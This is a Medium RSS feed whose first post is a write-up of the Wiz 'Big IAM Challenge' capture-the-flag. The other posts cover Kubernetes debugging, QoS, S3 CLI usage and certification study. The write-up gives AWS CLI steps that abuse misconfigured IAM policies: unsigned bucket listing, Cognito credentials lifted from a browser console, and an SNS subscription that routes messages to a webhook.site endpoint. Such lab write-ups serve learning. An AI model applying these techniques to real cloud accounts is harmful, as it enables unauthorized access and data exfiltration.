<?xml version="1.0" encoding="UTF-8"?><rss xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:content="http://purl.org/rss/1.0/modules/content/" xmlns:atom="http://www.w3.org/2005/Atom" version="2.0" xmlns:cc="http://cyber.law.harvard.edu/rss/creativeCommonsRssModule.html">
    <channel>
        <title><![CDATA[Stories by Geek Lady on Medium]]></title>
        <description><![CDATA[Stories by Geek Lady on Medium]]></description>
        <link>https://medium.com/@geek-lady?source=rss-d335d3a7fa8d------2</link>
        
        <generator>Medium</generator>
        <lastBuildDate>Wed, 06 May 2026 16:46:42 GMT</lastBuildDate>
        <atom:link href="https://medium.com/@geek-lady/feed" rel="self" type="application/rss+xml"/>
        <webMaster><![CDATA[yourfriends@medium.com]]></webMaster>
        <atom:link href="http://medium.superfeedr.com" rel="hub"/>
        <item>
            <title><![CDATA[Wiz IAM CTF challenge writeup]]></title>
            <link>https://geek-lady.medium.com/wiz-iam-ctf-challenge-writeup-4146d65c466a?source=rss-d335d3a7fa8d------2</link>
            <guid isPermaLink="false">https://medium.com/p/4146d65c466a</guid>
            <category><![CDATA[security]]></category>
            <category><![CDATA[s3]]></category>
            <category><![CDATA[cloud-security]]></category>
            <category><![CDATA[iam-roles]]></category>
            <dc:creator><![CDATA[Geek Lady]]></dc:creator>
            <pubDate>Tue, 01 Jul 2025 01:44:27 GMT</pubDate>
            <atom:updated>2025-07-01T01:44:27.356Z</atom:updated>
            <content:encoded><![CDATA[<p>I recently found this to be quite interesting <a href="https://bigiamchallenge.com/challenge/1">https://bigiamchallenge.com/</a>. Here’s my writeup.</p><h3><strong>Challenge 1 Buckets of fun</strong></h3><p>The IAM policy goes as follows. It shows that the user has access to thebigiamchallenge-storage-9979f4b bucket.</p><pre>{<br>    &quot;Version&quot;: &quot;2012-10-17&quot;,<br>    &quot;Statement&quot;: [<br>        {<br>            &quot;Effect&quot;: &quot;Allow&quot;,<br>            &quot;Principal&quot;: &quot;*&quot;,<br>            &quot;Action&quot;: &quot;s3:GetObject&quot;,<br>            &quot;Resource&quot;: &quot;arn:aws:s3:::thebigiamchallenge-storage-9979f4b/*&quot;<br>        },<br>        {<br>            &quot;Effect&quot;: &quot;Allow&quot;,<br>            &quot;Principal&quot;: &quot;*&quot;,<br>            &quot;Action&quot;: &quot;s3:ListBucket&quot;,<br>            &quot;Resource&quot;: &quot;arn:aws:s3:::thebigiamchallenge-storage-9979f4b&quot;,<br>            &quot;Condition&quot;: {<br>                &quot;StringLike&quot;: {<br>                    &quot;s3:prefix&quot;: &quot;files/*&quot;<br>                }<br>            }<br>        }<br>    ]<br>}</pre><p>So we will peek what’s inside the bucket first.</p><pre>&gt; aws s3 ls s3://thebigiamchallenge-storage-9979f4b - recursive<br>2023–06–05 19:13:53 37 files/flag1.txt<br>2023–06–08 19:18:24 81889 files/logo.png</pre><p>flag1.txt seems to be the target.</p><pre>&gt; aws s3 cp s3://thebigiamchallenge-storage-9979f4b/files/flag1.txt -</pre><p>The use case is exactly the same as this example.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*T1P9TpPFDSX8fF9TRstPXQ.png" /></figure><h3>Challenge 2 Analytics</h3><p>New challenge IAM policy.</p><pre>{<br>    &quot;Version&quot;: &quot;2012-10-17&quot;,<br>    &quot;Statement&quot;: [<br>        {<br>            &quot;Effect&quot;: &quot;Allow&quot;,<br>            &quot;Principal&quot;: &quot;*&quot;,<br>            &quot;Action&quot;: [<br>                &quot;sqs:SendMessage&quot;,<br>                &quot;sqs:ReceiveMessage&quot;<br>            ],<br>            &quot;Resource&quot;: &quot;arn:aws:sqs:us-east-1:092297851374:wiz-tbic-analytics-sqs-queue-ca7a1b2&quot;<br>        }<br>    ]<br>}</pre><p>By receiving the message from the queue, we get a bucket link in the body, where hides the flag.</p><pre>&gt; aws sqs receive-message --queue-url https://sqs.us-east-1.amazonaws.com/092297851374/wiz-tbic-analytics-sqs-queue-ca7a1b2<br>{<br>    &quot;Messages&quot;: [<br>        {<br>            &quot;MessageId&quot;: &quot;581287e7-08ab-445a-910c-7fca773e053f&quot;,<br>            &quot;ReceiptHandle&quot;: &quot;&quot;,<br>            &quot;MD5OfBody&quot;: &quot;&quot;,<br>            &quot;Body&quot;: &quot;&quot;<br>        }<br>    ]<br>}</pre><h3>Challenge 3 Enable Push Notifications</h3><p>IAM policy as follows,</p><pre>{<br>    &quot;Version&quot;: &quot;2008-10-17&quot;,<br>    &quot;Id&quot;: &quot;Statement1&quot;,<br>    &quot;Statement&quot;: [<br>        {<br>            &quot;Sid&quot;: &quot;Statement1&quot;,<br>            &quot;Effect&quot;: &quot;Allow&quot;,<br>            &quot;Principal&quot;: {<br>                &quot;AWS&quot;: &quot;*&quot;<br>            },<br>            &quot;Action&quot;: &quot;SNS:Subscribe&quot;,<br>            &quot;Resource&quot;: &quot;arn:aws:sns:us-east-1:092297851374:TBICWizPushNotifications&quot;,<br>            &quot;Condition&quot;: {<br>                &quot;StringLike&quot;: {<br>                    &quot;sns:Endpoint&quot;: &quot;*@tbic.wiz.io&quot;<br>                }<br>            }<br>        }<br>    ]<br>}</pre><p>The most straightforward way is just to subscribe to the topic with an email address which fits the endpoint criteria. But there are 2 problems. We can’t have an email ending with <em>tbic.wiz.io</em>. And we need to confirm subscription from the email.</p><p>So we have to look at other endpoints that can receive the push.</p><pre>--protocol (string)<br><br>The protocol that you want to use. Supported protocols include:<br><br>http – delivery of JSON-encoded message via HTTP POST<br>https – delivery of JSON-encoded message via HTTPS POST<br>email – delivery of message via SMTP<br>email-json – delivery of JSON-encoded message via SMTP<br>sms – delivery of message via SMS<br>sqs – delivery of JSON-encoded message to an Amazon SQS queue<br>application – delivery of JSON-encoded message to an EndpointArn for a mobile app and device<br>lambda – delivery of JSON-encoded message to an Lambda function<br>firehose – delivery of JSON-encoded message to an Amazon Kinesis Data Firehose delivery stream.</pre><p>We can use Http or https. The key is to construct a url with the same suffix.</p><pre>aws sns subscribe\<br> --topic-arn arn:aws:sns:us-east-1:092297851374:TBICWizPushNotifications \<br>--protocol https  \<br>--notification-endpoint https://webhook.site/b0948c06-98ff-4cfc-8c7f-6530db444bb5/@tbic.wiz.io</pre><p>I tried webhook.site as many suggested, but I faced the file or directory not found error.</p><h3>Challenge 4 Admin only?</h3><pre>{<br>    &quot;Version&quot;: &quot;2012-10-17&quot;,<br>    &quot;Statement&quot;: [<br>        {<br>            &quot;Effect&quot;: &quot;Allow&quot;,<br>            &quot;Principal&quot;: &quot;*&quot;,<br>            &quot;Action&quot;: &quot;s3:GetObject&quot;,<br>            &quot;Resource&quot;: &quot;arn:aws:s3:::thebigiamchallenge-admin-storage-abf1321/*&quot;<br>        },<br>        {<br>            &quot;Effect&quot;: &quot;Allow&quot;,<br>            &quot;Principal&quot;: &quot;*&quot;,<br>            &quot;Action&quot;: &quot;s3:ListBucket&quot;,<br>            &quot;Resource&quot;: &quot;arn:aws:s3:::thebigiamchallenge-admin-storage-abf1321&quot;,<br>            &quot;Condition&quot;: {<br>                &quot;StringLike&quot;: {<br>                    &quot;s3:prefix&quot;: &quot;files/*&quot;<br>                },<br>                &quot;ForAllValues:StringLike&quot;: {<br>                    &quot;aws:PrincipalArn&quot;: &quot;arn:aws:iam::133713371337:user/admin&quot;<br>                }<br>            }<br>        }<br>    ]<br>}</pre><p>This policy only restricts listing bucket but not getting objects. If we have the object path, we can get the object.</p><p>Even though there’s a condition to list bucket as an admin, it’s under ForAllValues. If the PrincipalArn is admin or doesn’t exist, both will be evaluated as true. We normally use ForAllValues in Deny statements. So we can pass ‘ — no-sign-request’ argument in the command, then credentials will not be loaded.</p><pre>aws s3 ls thebigiamchallenge-admin-storage-abf1321/files/ --no-sign-request</pre><p>After getting the path of the file, we can use the way to view it in the first challenge.</p><h3>Challenge 5 Do I know you?</h3><pre>{<br>    &quot;Version&quot;: &quot;2012-10-17&quot;,<br>    &quot;Statement&quot;: [<br>        {<br>            &quot;Sid&quot;: &quot;VisualEditor0&quot;,<br>            &quot;Effect&quot;: &quot;Allow&quot;,<br>            &quot;Action&quot;: [<br>                &quot;mobileanalytics:PutEvents&quot;,<br>                &quot;cognito-sync:*&quot;<br>            ],<br>            &quot;Resource&quot;: &quot;*&quot;<br>        },<br>        {<br>            &quot;Sid&quot;: &quot;VisualEditor1&quot;,<br>            &quot;Effect&quot;: &quot;Allow&quot;,<br>            &quot;Action&quot;: [<br>                &quot;s3:GetObject&quot;,<br>                &quot;s3:ListBucket&quot;<br>            ],<br>            &quot;Resource&quot;: [<br>                &quot;arn:aws:s3:::wiz-privatefiles&quot;,<br>                &quot;arn:aws:s3:::wiz-privatefiles/*&quot;<br>            ]<br>        }<br>    ]<br>}</pre><p>This challenge is very interesting. Open the image from the website in a new tab, and if we look at the url, it contains AccessKeyId. And the file sits in wiz-privatefiles s3 bucket.</p><p>Then we open the developer tool in the browser and locate the script for the image. We can tell that the credential comes from Cognito Identity, which we can use to access the files.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*n2W5EBtO8eTC7ereIr5vvQ.png" /></figure><p>So in the console, if we type AWS.config. credentials, we get the following information. It has AWS_ACCESS_KEY_ID, AWS_SECRET_ACCESS_KEY, AWS_SESSION_TOKEN values that we need.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*0lVJWnuV9vWQRPyEiwSMYA.png" /></figure><p>I’ve tried setting these in the terminal of the shell, but it doesn’t work. So I have to set the credentials locally.</p><pre>&gt; aws sts get-caller-identity<br>{<br>    &quot;UserId&quot;: &quot;AROARK7LBOHXJKAIRDRIU:CognitoIdentityCredentials&quot;,<br>    &quot;Account&quot;: &quot;092297851374&quot;,<br>    &quot;Arn&quot;: &quot;arn:aws:sts::092297851374:assumed-role/Cognito_s3accessUnauth_Role/CognitoIdentityCredentials&quot;<br>}</pre><p>We can tell if we’re assuming the right role by running the above command.</p><p>Then we get the file path and get the object like previous challenges.</p><pre>aws s3 ls wiz-privatefiles/<br>aws s3 cp s3://wiz-privatefiles/flag1.txt -</pre><h3>Challenge 6 One final push</h3><pre>{<br>    &quot;Version&quot;: &quot;2012-10-17&quot;,<br>    &quot;Statement&quot;: [<br>        {<br>            &quot;Effect&quot;: &quot;Allow&quot;,<br>            &quot;Principal&quot;: {<br>                &quot;Federated&quot;: &quot;cognito-identity.amazonaws.com&quot;<br>            },<br>            &quot;Action&quot;: &quot;sts:AssumeRoleWithWebIdentity&quot;,<br>            &quot;Condition&quot;: {<br>                &quot;StringEquals&quot;: {<br>                    &quot;cognito-identity.amazonaws.com:aud&quot;: &quot;us-east-1:b73cb2d2-0d00-4e77-8e80-f99d9c13da3b&quot;<br>                }<br>            }<br>        }<br>    ]<br>}</pre><p>With the cognito identity pool id, we can generate a new identity.</p><pre>&gt; aws cognito-identity get-id - identity-pool-id us-east-1:b73cb2d2–0d00–4e77–8e80-f99d9c13da3b<br>{<br>    &quot;IdentityId&quot;: &quot;us-east-1:157d6171-ee1e-c763–63d3–19e607043322&quot;<br>}</pre><pre>&gt; aws cognito-identity get-open-id-token - -identity-id &quot;{your_identityid}&quot;</pre><p>The challenge mentioned that it’s already authenticated with role: <em>arn:aws:iam::092297851374:role/Cognito_s3accessAuth_Role. </em>So we will assume this role.</p><pre>&gt; aws sts assume-role-with-web-identity \<br> --role-arn arn:aws:iam::092297851374:role/Cognito_s3accessAuth_Role \<br>--role-session-name iam-challenge-6 \<br>--web-identity-token &quot;{your_token}&quot;</pre><p>Then we run</p><pre>aws s3 ls</pre><p>It would list a few buckets. After trying accessing these buckets, only the last one is accessible.</p><p>Like what we did in previous challenges, we fetch the object and get the flag.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*XioJZQwvCID0gp7HzkkgzQ.png" /></figure><img src="https://medium.com/_/stat?event=post.clientViewed&referrerSource=full_rss&postId=4146d65c466a" width="1" height="1" alt="">]]></content:encoded>
        </item>
        <item>
            <title><![CDATA[Use crictl to debug a failing pod]]></title>
            <link>https://geek-lady.medium.com/use-crictl-to-debug-a-failing-pod-57404d955cae?source=rss-d335d3a7fa8d------2</link>
            <guid isPermaLink="false">https://medium.com/p/57404d955cae</guid>
            <category><![CDATA[kubernetes]]></category>
            <category><![CDATA[troubleshooting]]></category>
            <dc:creator><![CDATA[Geek Lady]]></dc:creator>
            <pubDate>Tue, 03 Jun 2025 13:25:06 GMT</pubDate>
            <atom:updated>2025-06-03T13:25:06.063Z</atom:updated>
            <content:encoded><![CDATA[<h3>What is crictl</h3><p>crictl provides a CLI for CRI-compatible container runtimes.</p><p>Container Runtime Interface (CRI) is a plugin interface that allows the kubelet to use various container runtimes without needing to recompile Kubernetes.</p><h3>When we use crictl</h3><ol><li><strong>Troubleshooting Pod Failures</strong></li></ol><p>Sometimes, kubectl get pods shows a pod in CrashLoopBackOff or ContainerCreating, but doesn&#39;t give the full story.</p><p><strong>2. When Working Directly with the Container Runtime</strong></p><p>Kubernetes uses a <strong>Container Runtime Interface (CRI)</strong> underneath (e.g., containerd, CRI-O). If you want to debug issues:</p><ul><li>Below the Kubernetes level</li><li>Or when kubelet is down</li></ul><p>3. Check Historical Container Info</p><p>kubectl only shows info about currently running or recently failed pods. If a container failed a while ago, it may be gone from kubectl.</p><h3>How to use it</h3><p>Firstly, run the command crictl ps -a . It is used to <strong>list all containers</strong> (both running and stopped) managed by the container runtime used by Kubernetes. It’s similar to docker ps -a command.</p><pre>CONTAINER ID        IMAGE                                                                                                             CREATED             STATE               NAME                       ATTEMPT<br>1f73f2d81bf98       busybox@sha256:141c253bc4c3fd0a201d32dc1f493bcf3fff003b6df416dea4f41046e0f37d47                                   7 minutes ago       Running             sh                         1<br>9c5951df22c78       busybox@sha256:141c253bc4c3fd0a201d32dc1f493bcf3fff003b6df416dea4f41046e0f37d47                                   8 minutes ago       Exited              sh                         0<br>87d3992f84f74       nginx@sha256:d0a8828cccb73397acb0073bf34f4d7d8aa315263f1e7806bf8c55d8ac139d5f                                     8 minutes ago       Running             nginx                      0<br>1941fb4da154f       k8s-gcrio.azureedge.net/hyperkube-amd64@sha256:00d814b1f7763f4ab5be80c58e98140dfc69df107f253d7fdd714b30a714260a   18 hours ago        Running             kube-proxy                 0</pre><p>Then we can use crictl logs [CONTAINER-ID] to extract logs.</p><img src="https://medium.com/_/stat?event=post.clientViewed&referrerSource=full_rss&postId=57404d955cae" width="1" height="1" alt="">]]></content:encoded>
        </item>
        <item>
            <title><![CDATA[Kubernetes Quality of Service and pod priority]]></title>
            <link>https://geek-lady.medium.com/kubernetes-quality-of-service-and-pod-priority-1a92b3aa1ead?source=rss-d335d3a7fa8d------2</link>
            <guid isPermaLink="false">https://medium.com/p/1a92b3aa1ead</guid>
            <category><![CDATA[kubernetes]]></category>
            <category><![CDATA[scheduling]]></category>
            <dc:creator><![CDATA[Geek Lady]]></dc:creator>
            <pubDate>Sat, 31 May 2025 13:25:58 GMT</pubDate>
            <atom:updated>2025-05-31T13:25:58.745Z</atom:updated>
            <content:encoded><![CDATA[<h3>Quality of Service (QoS)</h3><p>QoS is about <strong>how Kubernetes manages pod resources (CPU/memory)</strong> under <strong>resource pressure</strong> on a node.</p><p>There are <strong>three QoS classes</strong>:</p><ol><li><strong>Guaranteed</strong> — Pod requests and limits are <strong>equal and set</strong> for all containers.</li><li><strong>Burstable</strong> — Pod has <strong>limits and requests set</strong>, but <strong>not equal</strong>.</li><li><strong>BestEffort</strong> — Pod has <strong>no requests or limits</strong> set.</li></ol><p><strong>Effect:</strong> When a <strong>node</strong> runs out of memory or CPU, pods are evicted in this order: BestEffort → Burstable → Guaranteed</p><h3>Pod Priority</h3><p>Pod priority determines the <strong>importance of a pod</strong> during scheduling and eviction.</p><p>Higher priority pods:</p><ul><li>Are <strong>scheduled first</strong> when resources become available.</li><li>Are <strong>evicted last</strong> during node resource pressure.</li><li>Can trigger <strong>preemption</strong> of lower priority pods (if enabled).</li></ul><p><strong>Effect:</strong> If there’s resource contention across the <strong>cluster</strong>, <strong>lower priority pods may be preempted</strong> to make room for higher-priority ones.</p><p>Therefore, QoS and Pod Priority are two orthogonal features, but they both play roles in eviction decisions.</p><p>When node is under pressure,</p><ul><li>It first considers <strong>QoS class</strong>.</li><li>If multiple pods in the same QoS class are candidates, <strong>priority value</strong> breaks the tie.</li></ul><p>When scheduler is under pressure, it will only consider Pod Priority and PreemptionPolicy to decide which pods to evict.</p><img src="https://medium.com/_/stat?event=post.clientViewed&referrerSource=full_rss&postId=1a92b3aa1ead" width="1" height="1" alt="">]]></content:encoded>
        </item>
        <item>
            <title><![CDATA[aws s3 cp vs aws s3api get-object]]></title>
            <link>https://geek-lady.medium.com/aws-s3-cp-vs-aws-s3api-get-object-9822bf58c74f?source=rss-d335d3a7fa8d------2</link>
            <guid isPermaLink="false">https://medium.com/p/9822bf58c74f</guid>
            <category><![CDATA[aws]]></category>
            <category><![CDATA[aws-s3]]></category>
            <category><![CDATA[aws-cli]]></category>
            <dc:creator><![CDATA[Geek Lady]]></dc:creator>
            <pubDate>Mon, 03 Feb 2025 04:39:21 GMT</pubDate>
            <atom:updated>2025-02-03T04:43:09.594Z</atom:updated>
            <content:encoded><![CDATA[<h3>aws s3 cp VS aws s3api get-object</h3><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*xYscqStHCc4T77gxAakliQ.jpeg" /><figcaption>Photo by luis gomes: <a href="https://www.pexels.com/photo/close-up-photo-of-programming-of-codes-546819/">https://www.pexels.com/photo/close-up-photo-of-programming-of-codes-546819/</a></figcaption></figure><p>Recently I had to view a S3 object using CLI in a read-only environment. I was stuck for a while before I found the solution. Here are my learnings from it.</p><p>First of all, let’s look at s3 and s3api commands. This <a href="https://aws.amazon.com/blogs/developer/leveraging-the-s3-and-s3api-commands/">article</a> explained very well about the differences and use cases.</p><p><strong>In a word, </strong>aws s3api<strong>is low-level while </strong>aws s3<strong>is high-level.</strong> What does it mean? s3api commands directly invokes S3 API and has near one-to-one mapping to API. When we define policies and permissions for S3, we need to specify actions. One commonly used command is GetObject. You will find that s3api has corresponding commands for that, aws s3api get-object. aws s3 commands simplify managing objects and buckets.</p><p>Now, let’s take a deep dive into aws s3 cp and aws s3api get-object respectively.</p><h3>aws s3 cp</h3><p>The basic syntax is as follows,</p><pre>aws s3 cp<br>&lt;LocalPath&gt; &lt;S3Uri&gt; or &lt;S3Uri&gt; &lt;LocalPath&gt; or &lt;S3Uri&gt; &lt;S3Uri&gt;</pre><p>It can copy files between local storage and S3, or between S3 locations.</p><p>For example,</p><pre>aws s3 cp s3://mybucket/example.txt ./example.txt</pre><p>Back to the initial task I was given, I couldn’t create a new file nor save it into an existing file. Gladly, example 13 from the <a href="https://docs.aws.amazon.com/cli/latest/reference/s3/cp.html">official documentation</a> shows a way to stream the file as standard output by using a magical -.</p><pre>aws s3 cp s3://mybucket/example.txt -</pre><h3>aws s3api get-object</h3><p>The simplest command needs to include the bucket, key and outfile. Note that the outfile parameter is specified without an option name such as “ — outfile”. The name of the output file must be the last parameter in the command.</p><pre>aws s3api get-object<br>--bucket &lt;value&gt;<br>--key &lt;value&gt;<br>&lt;outfile&gt;</pre><p>For example,</p><pre>aws s3api get-object --bucket mybucket --key example.txt ./example.txt</pre><p>The output file doesn’t need to be created before running this command. It would create a new one if it doesn’t exist.</p><p>If it’s running successful, the output would be in JSON format.</p><pre>{<br>    &quot;AcceptRanges&quot;: &quot;bytes&quot;,<br>    &quot;LastModified&quot;: &quot;&quot;,<br>    &quot;ContentLength&quot;: ,<br>    &quot;ETag&quot;: &quot;\&quot;\&quot;&quot;,<br>    &quot;ContentType&quot;: &quot;&quot;,<br>    &quot;ServerSideEncryption&quot;: &quot;&quot;,<br>    &quot;Metadata&quot;: {}<br>}</pre><p>I’ve searched intensively in the <a href="https://docs.aws.amazon.com/cli/latest/reference/s3api/get-object.html">document</a> or the Internet but couldn’t find any clues of presenting the file without saving it locally.</p><h3>Conclusion</h3><p>aws s3 cp and aws s3api get-object are two representatives from s3 and s3api commands which are similar but different in many ways. aws s3 cp is indeed simple to use, suitable for copying files between local storage and S3, or between S3 locations. It can quickly show you the content of the file from the terminal. aws s3api get-object has more options hence provides granular control. The output of the command also contains rich information which might be useful for some.</p><img src="https://medium.com/_/stat?event=post.clientViewed&referrerSource=full_rss&postId=9822bf58c74f" width="1" height="1" alt="">]]></content:encoded>
        </item>
        <item>
            <title><![CDATA[I took a year to pass the CKA exam. Here’s my story.]]></title>
            <link>https://geek-lady.medium.com/i-used-a-year-to-pass-cka-exam-heres-my-story-c1ef22f2e536?source=rss-d335d3a7fa8d------2</link>
            <guid isPermaLink="false">https://medium.com/p/c1ef22f2e536</guid>
            <category><![CDATA[cka]]></category>
            <dc:creator><![CDATA[Geek Lady]]></dc:creator>
            <pubDate>Sun, 17 Jul 2022 05:50:58 GMT</pubDate>
            <atom:updated>2022-07-20T12:34:22.876Z</atom:updated>
            <content:encoded><![CDATA[<figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*4QrSM-O34CIJMc3cnAcNCg.jpeg" /><figcaption>Photo by <a href="https://unsplash.com/@duexsong?utm_source=unsplash&amp;utm_medium=referral&amp;utm_content=creditCopyText">Somruthai Keawjan</a> on <a href="https://unsplash.com/s/photos/roller-coaster?utm_source=unsplash&amp;utm_medium=referral&amp;utm_content=creditCopyText">Unsplash</a></figcaption></figure><h3>12 months to go</h3><p>I felt empty after clearing the AWS Associate Architect exam. While I was looking for my next challenge, I chatted to a buddy at work. He told me he was preparing for the <a href="https://training.mirantis.com/certification/dca-certification-exam/">DCA</a> (Docker Certified Associate) exam and his next goal would be the <a href="https://training.linuxfoundation.org/certification/certified-kubernetes-administrator-cka/">CKA</a> (Certified Kubernetes Admin) exam. After some research, I learned that getting CKA certification is more difficult and therefore, more rewarding to me. Without further ado, I registered for the exam.</p><p>The first thing I did was to hop onto the Internet and search ‘how to pass CKA’, most of the materials I found suggested setting two months aside to prepare. They also recommended two resources, a Udemy <a href="https://www.udemy.com/course/certified-kubernetes-administrator-with-practice-tests/">course</a> (also on <a href="https://kodekloud.com/">KodeKloud</a>) and <a href="http://killer.sh">Killer.sh</a>’s exam simulators, which were included in the exam.</p><h3>10 months to go</h3><p>I fell into a pit called self-doubt. It felt impossible to make my way through everything within only two months, because I would have to learn a lot (Linux, Docker, networking, etc.) to better understand Kubernetes. It was also then that I realised that I had to go at my own pace.</p><h3>8 months to go</h3><p>I kept myself away from Kubernetes for a few months and put my head in Terraform. Terraform was a popular skill to have, plus it was easy to pass. So I spent some time in Terraform and got certified, from which I gained some confidence.</p><h3>6 months to go</h3><p>I gave myself a 3-month Christmas break.</p><h3>3 months to go</h3><p>I was finally in a position for the final sprint after taking crash courses on <a href="https://www.openvim.com">Vim</a> and <a href="https://www.udemy.com/course/learn-docker/">Docker</a>. With Kubernetes being so heavily driven by manifests and config files, feeling comfortable with a powerful text editor like Vim was essential. And with Kubernetes as a prominent container orchestrator, it was important to understand exactly <strong>what</strong> I was orchestrating. Docker is so dominant in the container world that basically Docker is equivalent to container.</p><p>On my second attempt to complete the Udemy course, miraculously, I felt that Kubernetes was not difficult as it was before. Then I executed the following code.</p><blockquote>for (int i = days; i &gt; 0; i — ) {<br> watch(tutorial videos);<br> read(documentation);<br> practice(A_LOT);<br>}</blockquote><h3>2 weeks to go</h3><p>There was an episode before the exam. The PSI exam environment had changed, in an unfavourable way. Many people had <a href="https://www.reddit.com/r/kubernetes/comments/vmp631/recent_cka_change_to_a_remote_desktop/">complained</a> about the poor performance of the browser based remote desktop. This didn’t make me feel better about my chances in the exam.</p><h3>1 week to go</h3><p>To combat the growing exam anxiety, I signed up a mindfulness training course.</p><h3>Exam Day</h3><p>The exam experience was truly awful, just like what others complained. I felt panicked when 10 minutes passed and I hadn’t completed a single challenge. There were a lot of thoughts jumping into my mind at that moment. One of them was clicking the exit button and closing the lid of my laptop. Thankfully, I anticipated that these thoughts would come so I used some techniques such as focusing on breathing and shifted my mind successfully back to the task.</p><p>On the 9th of July 2022, I passed the CKA exam on the first go.</p><h3>TL; DR.</h3><h3>Dos</h3><ol><li>Better have a basic understanding of containers and Linux before studying Kubernetes.</li><li>Use the Udemy <a href="https://www.udemy.com/course/certified-kubernetes-administrator-with-practice-tests/">course</a> and exam <a href="http://killer.sh">simulators</a>. These are the main resources that I utilised and they are truly helpful.</li><li>Practice. Practice. Practice. Even though new exam environment is not as smooth as before, being prepared and keeping a good attitude help.</li></ol><h3>Don’ts</h3><ol><li>Don’t push yourself too hard. Everyone has their own pace.</li><li>Don’t be intimidated by the CKA exam. There’s a free retake after all.</li><li>Don’t give up. You can achieve your goal, as long as you hang in there a bit.</li></ol><img src="https://medium.com/_/stat?event=post.clientViewed&referrerSource=full_rss&postId=c1ef22f2e536" width="1" height="1" alt="">]]></content:encoded>
        </item>
        <item>
            <title><![CDATA[An incomplete guide to pass AWS Solution Architect Associate]]></title>
            <link>https://geek-lady.medium.com/an-incomplete-guide-to-pass-aws-solution-architect-associate-bc6119262846?source=rss-d335d3a7fa8d------2</link>
            <guid isPermaLink="false">https://medium.com/p/bc6119262846</guid>
            <category><![CDATA[solution-architect]]></category>
            <category><![CDATA[aws]]></category>
            <dc:creator><![CDATA[Geek Lady]]></dc:creator>
            <pubDate>Fri, 26 Feb 2021 22:12:18 GMT</pubDate>
            <atom:updated>2021-02-27T02:07:27.961Z</atom:updated>
            <content:encoded><![CDATA[<figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*DmUf9smSja1BOTHOTtIFew.jpeg" /><figcaption>Photo by Green Chameleon on Unsplash</figcaption></figure><h3>An incomplete guide to pass AWS Solution Architect Associate exam</h3><h3>About me</h3><p>80% self-taught coding, almost 0 AWS experience, didn’t study Cloud Practitioner, 1.5 months to prepare. Used materials from AWS SheBuilds Cloud U, Stephane Maarek’s lectures and practice exams on Udemy, Demystifying the exam on Pluralsight. In addition, I attended a 3 day AWS Sys Ops training.</p><h3>Overview of the exam</h3><ul><li>Multiple choice questions, with single or multiple selections</li><li><em>65</em> questions</li><li><em>130</em> minutes but extra <em>30</em> minutes for people who’re not native English speakers (need to apply accommodation before registering the exam)</li><li>Domains include designing resilient (30%), performant (28%), secure (24%), cost-optimised architecture (18%).</li></ul><p>All right, let’s jump to the core: how to prepare for this exam.</p><p>I would divide my learning journey into 3 parts, <strong>creating points, connecting dots and last sprint.</strong></p><h3>Creating points (~3 w)</h3><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*wDXlqun-rYe_qbqKe2gPOQ.jpeg" /><figcaption>Photo by <a href="https://unsplash.com/@na_photo?utm_source=unsplash&amp;utm_medium=referral&amp;utm_content=creditCopyText">Nagy Arnold</a> on <a href="https://unsplash.com/s/photos/geometry-dot?utm_source=unsplash&amp;utm_medium=referral&amp;utm_content=creditCopyText">Unsplash</a></figcaption></figure><p>The purpose of this stage is to familiarise with AWS services. If you have free access to Udemy, you can watch Ultimate AWS Certified Solutions Architect Associate 2021. It’s very detailed and lecturer would mention past exam questions from time to time. However, this course is very long (27 sections, 24h 10m) and not structured well. To better use this material, I recommend watching it selectively.</p><p>If you don’t have access, that’s all right. You can make full use of the documentation (https://docs.aws.amazon.com/)! Services are grouped together. I will prioritise groups based on frequencies of questions that appear in the exam, roughly.</p><h4><strong>Compute (EC2, Lambda)</strong></h4><h4>Networking &amp; Content Delivery (VPC, Elastic Load Balancing, CloudFront, Route53, Direct Connect, VPN, Global Accelerator)</h4><h4>Storage (S3, EBS, S3 Glacier, EFS)</h4><h4>Database (RDS, Aurora, DynamoDB, ElastiCache)</h4><h4>Security, Identity &amp; Compliance (IAM)</h4><h4>Management &amp; Governance (Auto Scaling, CloudWatch,)</h4><h4>Application Integration (SNS, SQS)</h4><h4>Cryptography &amp; PKI (KMS)</h4><h4>Analytics (Kinesis)</h4><h4>Containers (ECS, EKS)</h4><p>The below topics in my memory appeared once in the exam.</p><p>FSx, Storage Gateway, Elastic Beanstalk, Redshift, Cognito, GuardDuty, Resource Access Manager, WAF, Shield, Certificate Manager, CloudFormation, Config, CloudTrail, Systems Manager, DataSync, Database Migration Service, API Gateway, Glue, Athena, Billing &amp; Cost Management.</p><p>When I completed this stage, I felt that my mind was blowing. I was also frustrated as I couldn’t remember what I learned in the beginning. But don’t stress, keep reading.</p><h3>Connecting dots (~ 2w)</h3><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*dWnv979UtkMXjgvZgMGhNg.jpeg" /><figcaption>Photo by <a href="https://unsplash.com/@lucabravo?utm_source=unsplash&amp;utm_medium=referral&amp;utm_content=creditCopyText">Luca Bravo</a> on <a href="https://unsplash.com/s/photos/line?utm_source=unsplash&amp;utm_medium=referral&amp;utm_content=creditCopyText">Unsplash</a></figcaption></figure><p>Exam question is basically describing a scenario and asking you to choose the best solution that satisfies requirements.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*3i-3bNC4gioW6xkI2rPP3Q.png" /><figcaption>example question</figcaption></figure><p>From this sample question, we can see that AWS is examinng our ability to design a solution combining services. Well, this is definitely essential to SA as architecture is never complete without compute/storage/network/…</p><p>Apart from integrating each block (compute/storage/network, etc.), we need to associate them with the four domains.</p><p>I learned Architecting on AWS and Exam Readiness courses in CloudU. The second course has an alternative on Pluralsight, called Demystifying the AWS Certified Solutions Architect: Associate Exam. 5 star rating, no complaints.</p><p>After the second round of study, you should be able to explain each bullet point in this extracted content outline.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/904/1*oXkM6K9OD9WI6ERh_TB2ww.png" /><figcaption>content outline</figcaption></figure><p>This is the most rewarding learning stage. You feel like you have a big picture perspective now.</p><h3>Last sprint (~1w)</h3><figure><img alt="" 